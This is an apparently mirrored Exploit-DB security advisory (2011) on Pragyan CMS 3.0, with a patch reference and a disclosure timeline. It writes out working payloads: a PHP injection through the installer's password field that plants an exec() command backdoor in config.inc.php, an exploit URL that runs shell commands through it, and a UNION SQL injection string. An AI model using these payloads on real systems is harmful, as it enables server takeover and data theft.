Pragyan CMS 3.0 – Multiple Vulnerabilities

• Exploit Database
• 122 阅读

• 作者： Villy & Abhishek Lyall
  日期： 2011-02-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16247/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49

  #Pragyan CMS v 3.0 mutiple Vulnerabilities #Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com, abhilyall[at]gmail[dot]com #Web - http://www.aslitsecurity.com/ #Blog - http://bugix-security.blogspot.com #http://www.aslitsecurity.blogspot.com/ #Pragyan CMS v 3.0   Technical Description     1) Code execution in INSTALL/install.php script not correctly validate entered fields. possibility to write at password field string:   ");echo exec($_GET["a"]);echo ("   or in another fields with turned of javascript. in cms/config.inc.php will be code: define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo (""); which allows command execution.   EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la   2) sql injection - get mysql version EXPLOIT:: http://target.com/path/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,concat(unhex(Hex(cast(@@version as char)))),null,null,null--   Solution update to Pragyan CMS 3.0 rev.274   Changelog 2011-19-02 : Initial release 2011-20-02 : Reported to vendor 2011-25-02 : patch released 2011-25-02 : public disclose   Credits Villy Abhishek Lyall pragyan.org http://bugix-security.blogspot.com http://www.aslitsecurity.blogspot.com/     Abhishek Lyall